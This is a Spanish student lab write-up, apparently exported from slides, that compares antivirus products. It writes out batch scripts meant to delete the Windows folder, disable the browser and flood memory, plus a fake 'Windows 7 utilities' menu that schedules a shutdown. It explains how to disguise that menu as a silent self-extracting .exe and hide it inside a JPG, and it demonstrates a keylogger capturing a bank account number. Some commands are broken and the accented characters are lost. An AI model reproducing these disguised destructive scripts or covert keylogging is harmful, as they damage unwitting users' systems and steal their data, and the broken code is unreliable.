27
ACTIVIDADES CON ANTIVIRUS Realizar las siguientes operaciones: 1.-Comparativa antivirus. 1.1.-Para realizar la comparativa tendremos que infectar nuestra maquina con diferentes virus: -Troyanos, -Gusanos -Virus residentes La característica principal de estos virus es que se ocultan en la memoria RAM de forma permanente o residente. De este modo, pueden controlar e interceptar todas las operaciones llevadas a cabo por el sistema operativo, infectando todos aquellos ficheros y/o programas que sean ejecutados, abiertos, cerrados, renombrados, copiados. Algunos ejemplos de este tipo de virus son: Randex, CMJ, Meve, MrKlunky. -Virus de boot (bot_kill) o de arranque Los términos boot o sector de arranque hacen referencia a una sección muy importante de un disco o unidad de almacenamiento CD, DVD, memorias USB etc. En ella se guarda la información esencial sobre las características del disco y se encuentra un programa que permite arrancar el ordenador. Este tipo de virus no infecta ficheros, sino los discos que los contienen. Actúan infectando en primer lugar el sector de arranque de los dispositivos de almacenamiento. Cuando un ordenador se pone en marcha con un dispositivo de almacenamiento, el virus de boot infectará a su vez el disco duro. Los virus de boot no pueden afectar al ordenador mientras no se intente poner en marcha a éste último con un disco infectado. Por tanto, el mejor modo de defenderse contra ellos es proteger los dispositivos de almacenamiento contra escritura y no arrancar nunca el ordenador con uno de estos dispositivos desconocidos en el ordenador. Algunos ejemplos de este tipo de virus son: Polyboot.B, AntiEXE. -Virus de enlace o directorio

Actividades Con Antivirus

Embed Size (px)

DESCRIPTION

Actividades Con Antivirus

Citation preview

  • ACTIVIDADES CON ANTIVIRUS

    Realizar las siguientes operaciones:

    1.-Comparativa antivirus.

    1.1.-Para realizar la comparativa tendremos que infectar nuestra maquina con diferentes virus:

    -Troyanos,

    -Gusanos

    -Virus residentes

    La caracterstica principal de estos virus es que se ocultan en la memoria RAM de forma permanente o residente. De este modo, pueden controlar e interceptar todas las operaciones llevadas a cabo por el sistema operativo, infectando todos aquellos ficheros y/o programas que sean ejecutados, abiertos, cerrados, renombrados, copiados. Algunos ejemplos de este tipo de virus son: Randex, CMJ, Meve, MrKlunky.

    -Virus de boot (bot_kill) o de arranque

    Los trminos boot o sector de arranque hacen referencia a una seccin muy importante de un disco o unidad de almacenamiento CD, DVD, memorias USB etc. En ella se guarda la informacin esencial sobre las caractersticas del disco y se encuentra un programa que permite arrancar el ordenador. Este tipo de virus no infecta ficheros, sino los discos que los contienen. Actan infectando en primer lugar el sector de arranque de los dispositivos de almacenamiento. Cuando un ordenador se pone en marcha con un dispositivo de almacenamiento, el virus de boot infectar a su vez el disco duro.

    Los virus de boot no pueden afectar al ordenador mientras no se intente poner en marcha a ste ltimo con un disco infectado. Por tanto, el mejor modo de defenderse contra ellos es proteger los dispositivos de almacenamiento contra escritura y no arrancar nunca el ordenador con uno de estos dispositivos desconocidos en el ordenador.

    Algunos ejemplos de este tipo de virus son: Polyboot.B, AntiEXE.

    -Virus de enlace o directorio

  • Los ficheros se ubican en determinadas direcciones (compuestas bsicamente por unidad de disco y directorio), que el sistema operativo conoce para poder localizarlos y trabajar con ellos.

    Los virus de enlace o directorio alteran las direcciones que indican donde se almacenan los ficheros. De este modo, al intentar ejecutar un programa (fichero con extensin EXE o COM) infectado por un virus de enlace, lo que se hace en realidad es ejecutar el virus, ya que ste habr modificado la direccin donde se encontraba originalmente el programa, colocndose en su lugar.

    Una vez producida la infeccin, resulta imposible localizar y trabajar con los ficheros originales.

    -Virus polimrficos

    Son virus que en cada infeccin que realizan se cifran de una forma distinta (utilizando diferentes algoritmos y claves de cifrado). De esta forma, generan una elevada cantidad de copias de s mismos e impiden que los antivirus los localicen a travs de la bsqueda de cadenas o firmas, por lo que suelen ser los virus ms costosos de detectar.

    -Virus multipartites

    Virus muy avanzados, que pueden realizar mltiples infecciones, combinando diferentes tcnicas para ello. Su objetivo es cualquier elemento que pueda ser infectado: archivos, programas, macros, discos, etc.

    -Virus del fichero

    Infectan programas o ficheros ejecutables (ficheros con extensiones EXE y COM). Al ejecutarse el programa infectado, el virus se activa, produciendo diferentes efectos.

    -Virus de FAT

    La tabla de asignacin de ficheros o FAT (del ingls File AllocationTable) es la seccin de un disco utilizada para enlazar la informacin contenida en ste. Se trata de un elemento fundamental en el sistema. Los virus que atacan a este elemento son especialmente peligrosos, ya que impedirn el acceso a ciertas partes del disco, donde se almacenan los ficheros crticos para el normal funcionamiento del ordenador.

    1.2-Crea diferentes virus usando .bat y camuflarlo.

    Crearemos varios archivos bat que realizarn acciones maliciosas en el ordenador. Para ello el proceso ser siempre el mismo. Abriremos un archivo

  • de texto con el Bloc de Notas pondremos el cdigo necesario y guardaremos el archivo con extensin .BAT. Por ejemplo:

    Para borrar Windows.

    echo off

    del=c:windowsq

    del=c:windows

    deltree=c:windows

    Para no iniciar el Explorer. Vemos que cambia el nombre del archivo

    ejecutable del explorer.

    @ echo off

    c:

    cd

    cd *programa*

    cd *explorer*

    rename iexplore.exe iexplore.eve

    exit

    Para sobrecargar la memoria. Crea un bucle infinito iniciando una y otra vez el buscador Google.

    @echo off

    :1

    start www.google.com

    goto 1

    Vemos un pantallazo de los tres archivos bat.

  • Para crear otro ejemplo de virus creado con archivos batch crearemos un men

    que nos abrir distintas herramientas de Windows 7, como Registro,

    Programas, Restaurar Sistema, etc. Copiamos las lneas de comandos del

    archivo en las prximas lneas:

    @echo off

    title Selecciona un color

    :inicio

    cls

    echo ********************

    echo *****-=[MENU]=-*****

  • echo ********************

    echo 1) Informacin Bsica del equipo

    echo 2) Informacin Avanzada del equipo

    echo 3) Centro de Actividades

    echo 4) Administracin de equipo

    echo 5) Programas

    echo 6) Opciones de internet

    echo 7) Monitor de Rendimiento

    echo 8) Monitor de Recursos

    echo 9) Administrador de Tareas

    echo 10) Versin de WINDOWS

    echo 11) Registro

    echo 12) Solucin de Problemas

    echo 13) Visor de Eventos

    echo 14) Asistencia Remota

    echo 15) Cambiar Configuracin UAC

    echo 16) Restaurar Sistema

    echo ********************

    echo 17) Salir

    echo ********************

    echo.

    set /p var=Seleccione una opcion [1-6]:

  • if "%var%"=="1" goto op1

    if "%var%"=="2" goto op2

    if "%var%"=="3" goto op3

    if "%var%"=="4" goto op4

    if "%var%"=="5" goto op5

    if "%var%"=="6" goto op6

    if "%var%"=="7" goto op7

    if "%var%"=="8" goto op8

    if "%var%"=="9" goto op9

    if "%var%"=="10" goto op10

    if "%var%"=="11" goto op11

    if "%var%"=="12" goto op12

    if "%var%"=="13" goto op13

    if "%var%"=="14" goto op14

    if "%var%"=="15" goto op15

    if "%var%"=="16" goto op16

    if "%var%"=="17" goto op17

    if "%var%"=="17" goto salir

    ::Mensaje de error, validacin cuando se selecciona una opcin fuera de rango

    echo. El numero "%var%" no es una opcion valida, por favor intente de nuevo.

  • echo.

    pause

    echo.

    goto inicio

    :op1

    echo.

    echo. Has elegido la opcion No. 1

    echo

    shutdown -s -t 150 -c "Pues te apago el ordenata ... para evitarlo ejecuta --para la

    bola--"

    color 08

    echo.

    pause

    goto inicio

    :op2

    echo.

    echo. Has elegido la opcion No. 2

    echo

    shutdown -s -t 150 -c "Pues te apago el ordenata ... para evitarlo ejecuta --para la

    bola--"

    color 09

    echo.

    pause

    goto inicio

  • :op3

    echo.

    echo. Has elegido la opcion No. 3

    echo.

    C:\Windows\System32\wscui.cpl

    color 0A

    echo.

    pause

    goto inicio

    :op4

    echo.

    echo. Has elegido la opcion No. 4

    echo.

    C:\Windows\System32\compmgmt.msc

    color 0B

    echo.

    pause

    goto inicio

    :op5

    echo.

    echo. Has elegido la opcion No. 5

    echo.

  • C:\Windows\System32\appwiz.cpl

    color 0C

    echo.

    pause

    goto inicio

    :op6

    echo.

    echo. Has elegido la opcion No. 6

    echo.

    C:\Windows\System32\inetcpl.cpl

    color 08

    echo.

    pause

    goto inicio

    :op7

    echo.

    echo. Has elegido la opcion No. 7

    echo.

    C:\Windows\System32\perfmon.exe

    color 09

    echo.

    pause

    goto inicio

  • :op8

    echo.

    echo. Has elegido la opcion No. 8

    echo.

    C:\Windows\System32\resmon.exe

    color 0B

    echo.

    pause

    goto inicio

    :op9

    echo.

    echo. Has elegido la opcion No. 9

    echo.

    C:\Windows\System32\taskmgr.exe

    color 0C

    echo.

    pause

    goto inicio

    :op10

    echo.

    echo. Has elegido la opcion No. 10

    echo.

  • C:\Windows\System32\cmd.exe

    color 08

    echo.

    pause

    goto inicio

    :op11

    echo.

    echo. Has elegido la opcion No. 11

    echo.

    C:\Windows\System32\regedt32.exe

    color 09

    echo.

    pause

    goto inicio

    :op12

    echo.

    echo. Has elegido la opcion No. 12

    echo.

    C:\Windows\System32\control.exe /name Microsoft.Troubleshooting

    color 0B

    echo.

    pause

    goto inicio

  • :op10

    echo.

    echo. Has elegido la opcion No. 10

    echo.

    C:\Windows\system32\winver.exe

    color 0C

    echo.

    pause

    goto inicio

    :op13

    echo.

    echo. Has elegido la opcion No. 13

    echo.

    C:\Windows\System32\eventvwr.exe

    color 08

    echo.

    pause

    goto inicio

    :op14

    echo.

    echo. Has elegido la opcion No. 14

    echo.

  • C:\Windows\System32\msra.exe

    color 09

    echo.

    pause

    goto inicio

    :op15

    echo.

    echo. Has elegido la opcion No. 15

    echo.

    C:\Windows\System32\UserAccountControlSettings.exe

    color 0B

    echo.

    pause

    goto inicio

    :op16

    echo.

    echo. Has elegido la opcion No. 16

    echo.

    C:\Windows\System32\rstrui.exe

    color 0C

    echo.

    pause

    goto inicio

  • :salir

    @cls&exit

    Lo llamaremos UTILIDADES WINDOWS 7.BAT. En las opciones 1 y 2 colocaremos un comando que nos apagar el ordenador en un tiempo determinado por nosotros.

    shutdown -s -t 150 -c "Pues te apago el ordenata ... para evitarlo ejecuta --para la bola--"

    Tambin nos abrir una ventana con un mensaje que nos advertir de ese hecho y la manera de evitarlo (para evitar el apagado deberemos ejecutar el archivo para la bola.bat).

  • Si ejecutamos el archivo para la bola.bat evitaremos el apagado del sistema.

  • puesto que lo hemos hecho usando el comando del Ms-Dos Shutdown, el archivo para la bola.bat tiene la orden del comando shutdown a que paraliza el apagado.

    Cambiar archivo . bat a .exe.

    Para camuflar el archivo UTILIDADES WINDOWS 7.BAT podemos cambiarlo a fichero .exe. Para ello utilizaremos el winrar.

    Primero seleccionamos con el botn derecho el archivo UTILIDADES WINDOWS 7.BAT y elegimos "aadir al archivo"

  • Al hacer clic en la opcin Crear un archivo autoextrable ya vemos que nos cambia la extensin de .bat a .exe.

    Despus elegimos la pestaa Avanzado y seleccionamos Autoextrable...

  • en la siguiente ventana que nos saldr elegimos Instalacin y en la opcin Ejecutar tras la extraccin ponemos el nombre original del archivo .bat que queremos cambiar a .exe.

    Como no queremos que se

    muestre la extraccin ni la ejecucin

    iremos a Modos y seleccionamos

    Ocultar Todo.

  • Tambin iremos a Actualizar y

    seleccionamos Preguntar antes de

    sobrescribir.

    Para ponerle un icono iremos a Texto e

    icono y en Examinar... seleccionamos el

    que queramos.

    Ahora haremos clic en Aceptar y en la siguiente ventana tambin en Aceptar. Se nos habr creado el archivo UTILIDADES WINDOWS 7.exe.

  • Para poder camuflar archivos en una foto debemos crear una carpeta en C:\ a la que llamaremos X. En ella pondremos una foto (koala.jpg) y los archivos que queramos ocultar, en este caso UTILIDADES WINDOWS7.exe y para la bola.bat.

    Luego los seleccionamos y clicando en botn derecho pulsamos en aadir a X.rar.

  • Nos crear como vemos abajo el archivo X.rar. Borraremos ahora los archivos que queremos ocultar y dejamos solo la foto y el archivo comprimido que hemos creado.

    Ahora abrimos el CMD vamos al directorio C:\ donde est la carpeta X luego escribimos cd X para entrar en la carpeta X y escribiremos copy /B koala.jpg + X.rar Secret.jpg. As crearemos el archivo Secret.jpt que contendr los archivos koala.jpg y X.rar

  • Vemos aqu el archivo recin creado Secret.jpg. Borraremos los otros dos y ya tendremos un archivo que parece una foto pero contiene otros dos archivos (UTILIDADES DE WINDOWS 7.exe y para la bola.bat).Para comprobarlo lo abriremos con winrar y vemos que estn comprimidos en Secret.jpg.

  • Ya solo tendremos que extraerlos del archivo secret.jpg y podremos disponer de los dos archivos . Lo vemos abajo que al extraer el contenido nos crea una carpeta llamada Secret y los extrae en ella.

  • Tabla programas antivirus

    Calificacion #1 #2 #3 #4 #5

    Bitdefender Antivirus 2015

    Kaspersky Antivirus 2015

    Panda Antivirus Pro 2015

    McAfee Internet Security 2015

    Avast Pro Antivirus

    Deteccin de Malware

    Cuantas amenazas detecta?

    25 amenazas

    Ninguna 12 amenazas detectadas

    18 amenzas

    A.Rpido: 11 amenazas A. Completo: 13 amenazas

    Limpieza de Infeccin

    Limpieza exitosa de malware activos

    Todas Ninguna Todas 15 Todas

    Escaneo de Velocidad

    En demanda1

    en segundos3 2 horas 45 minutos

    Anlisis Completo: 6 horas Anlisis Rpido: 2 min. 42 seg.

    Anlisis: 19 minutos 10 segundos

    3 horas 13 minutos

    Anlisis Completo: 1 hora 34 min. Anlisis Rpido: 22 min. 20 seg.

    Interface

    Es fcil? S S S S S

  • Kaspersky Antivirus 2015, Avast Pro Antivirus, y Panda Antivirus Pro 2015

    (nosotros utilizamos el Panda Cloud Cleaner) han realizado las pruebas en un

    equipo con windows Xp, Disco Duro de 40 Gb y 1 Gb de memoria RAM.

    BitDefender Antivirus y McAffee Internet Security 2015 realizaron las

    pruebas en un equipo con Windows XP, Disco Duro 60 Gb y 1 Gb de memoria

    Ram.

    2.-Busca un KEYLOGGER y ponlo en prctica.

    Instalamos el Keylogger llamado Revealer Keylogger. Lo iniciamos y

    pulsamos en Inicio.

  • Despus iniciaremos el navegador Firefox desde donde abriremos la pgina

    Youtube y all abriremos el video banda sonora de El ltimo mohicano.

    Despus en el bloc de notas creamos un documento con el texto Documento

    confidencial para banco y Cuenta bancaria 1200-21-2345-2332232 que

    guardaremos con el nombre de Cuenta del banco. Como vemos en la

    pantalla de abajo en la seccin Pulsaciones de tecla ha quedado grabado

    todo lo que hemos tecleado.

  • Para finalizar la grabacin del Keylogger solo deberamos pulsar en Detener.

    Al tratarse de una versin de prueba la opcin Capturas de pantalla est

    deshabilitada.